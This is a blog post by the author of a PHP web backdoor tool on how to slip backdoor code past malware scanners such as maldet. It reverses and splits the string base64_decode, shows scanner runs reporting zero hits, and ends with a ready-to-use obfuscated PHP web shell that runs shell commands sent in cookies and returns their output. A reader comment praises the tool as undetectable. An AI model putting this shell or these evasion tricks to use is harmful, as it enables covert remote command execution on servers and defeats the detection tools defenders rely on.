Bypass base64 decoder detection

Almost two weeks after WeBaCoo’s release, I started to organize the results from various tests under different protection/detection tools for a comprehensive writeup. Something that draw my attention is how easily some malware scanning tools mark as “threat” WeBaCoo’s generated backdoor code. A simple use of the base64 decoder function is enough to trigger scanner’s content matching rulesets no matter what the processing data are. Additionally to this strict approach, I came forward recently in the Internet with some official web backdoor detection tutorials including content matching checks for the decoder function. These two things led me to a small research for finding tricks to bypass such content matching mechanisms.

A list of tools and scripts that marked as “threat” WeBaCoo’s generated code based on the base64 decoder use, is as following (check the first image gallery at the end of the post for report screenshots):

After inspecting how the above tools work, I thought two main methods that can be used to trick the base64 encoder content matching rules: string reversing and string splitting. These two methods can be combined to create more tricky code, always taking into account the least possible character use. WeBaCoo generates PHP backdoor code, so I will work these methods under PHP. Although the same concept can be applied to other languages too.

 

String Reversing

Lucky for us PHP provides the strrev() function in order to easily reverse a string. Knowing that base64_decoder was the function name that triggered the above tools, strrev can be used to trick them. Let’s form an example to see that our concept works before proceeding to backdoor alterations.

<?php
//base64 encode of "show me your code"
$data="c2hvdyBtZSB5b3VyIGNvZGU=";
 
//$bd="base64_decode"
$bd=strrev("edoced_46esab");
 
//print decoded data
//eval is used to evaluate string as PHP code
eval("echo \$bd(\$data);");
?>
root@testbed:~# php reverse.php
show me your code
root@testbed:~# maldet -a /var/www/pwn/reverse.php
Linux Malware Detect v1.4.1
(C) 2002-2011, R-fx Networks (C) 2011, Ryan MacDonald
inotifywait (C) 2007, Rohan McGovern
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(4332): {scan} signatures loaded: 8668 (6804 MD5 / 1864 HEX)
maldet(4332): {scan} building file list for /var/www/pwn/reverse.php, this might take awhile...
maldet(4332): {scan} file list completed, found 1 files...
maldet(4332): {scan} found ClamAV clamscan binary, using as scanner engine...
maldet(4332): {scan} scan of /var/www/pwn/reverse.php (1 files) in progress...

maldet(4332): {scan} scan completed on /var/www/pwn/reverse.php: files 1, malware hits 0, cleaned hits 0
maldet(4332): {scan} scan report saved, to view run: maldet --report 121111-2034.4332

 

String Splitting

The concept behind this technique is to split the trigger string (“base64_decode”) into smaller chunks, that can be later concatenated to form the function name.

<?php
//base64 encode of "show me your code"
$data="c2hvdyBtZSB5b3VyIGNvZGU=";
 
//split into two chunks
$ac="base6";
$bc="4_decode";
 
//concat the chunks
$cc=$ac.$bc;
 
//print decoded data
//eval is used to evaluate string as PHP code
eval("echo \$cc(\$data);");
?>
root@testbed:~# php split.php
show me your code
root@testbed:~# maldet -a /var/www/pwn/split.php
Linux Malware Detect v1.4.1
(C) 2002-2011, R-fx Networks (C) 2011, Ryan MacDonald
inotifywait (C) 2007, Rohan McGovern
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(4509): {scan} signatures loaded: 8668 (6804 MD5 / 1864 HEX)
maldet(4509): {scan} building file list for /var/www/pwn/split.php, this might take awhile...
maldet(4509): {scan} file list completed, found 1 files...
maldet(4509): {scan} found ClamAV clamscan binary, using as scanner engine...
maldet(4509): {scan} scan of /var/www/pwn/split.php (1 files) in progress...

maldet(4509): {scan} scan completed on /var/www/pwn/split.php: files 1, malware hits 0, cleaned hits 0
maldet(4509): {scan} scan report saved, to view run: maldet --report 121111-2049.4509

 

Knowing that the above two techniques work against decoder’s string name detection, they can be combined to form the desired functionality. The following PHP code is a short example of such a combination that is used in the new backdoor code. I will conduct the same tests to see if the new backdoor code successfully passes all of them. You can see the results in the second image gallery at the end of the post.

<?php $c=strrev("edoced_4"."6esab");eval($c("aWYoaXNzZXQoJF9DT09LSUVbJ2NtJ10pKXtvYl9zdGFydCgpO3N5c3RlbShiYXNlNjRfZGVjb2RlKCRfQ09PS0lFWydjbSddKS4nIDI+JjEnKTtzZXRjb29raWUoJF9DT09LSUVbJ2NuJ10sJF9DT09LSUVbJ2NwJ10uYmFzZTY0X2VuY29kZShvYl9nZXRfY29udGVudHMoKSkuJF9DT09LSUVbJ2NwJ10pO29iX2VuZF9jbGVhbigpO30=")); ?>

 

These two techniques will be implemented in WeBaCoo’s next release after I conclude to the more efficient ways of use.

 

Initial Code Report Results

New Code Report Results

 
DISCLAIMER: I’m not responsible with what you do with this info. This information is for educational purposes only.
 

 

A. Bechtsoudis

2 Comments

ivan moralesSeptember 7th, 2012 at 16:58

i use WeBaCoo its very useful.. but maybe you can code in same .pl add custom shell.. and after you tool can ofuscated.. cuz you tool its undedetectable… thanks in advance

anestisbSeptember 11th, 2012 at 10:32

I’m not sure that understood your comment. What is exactly your addition suggestion?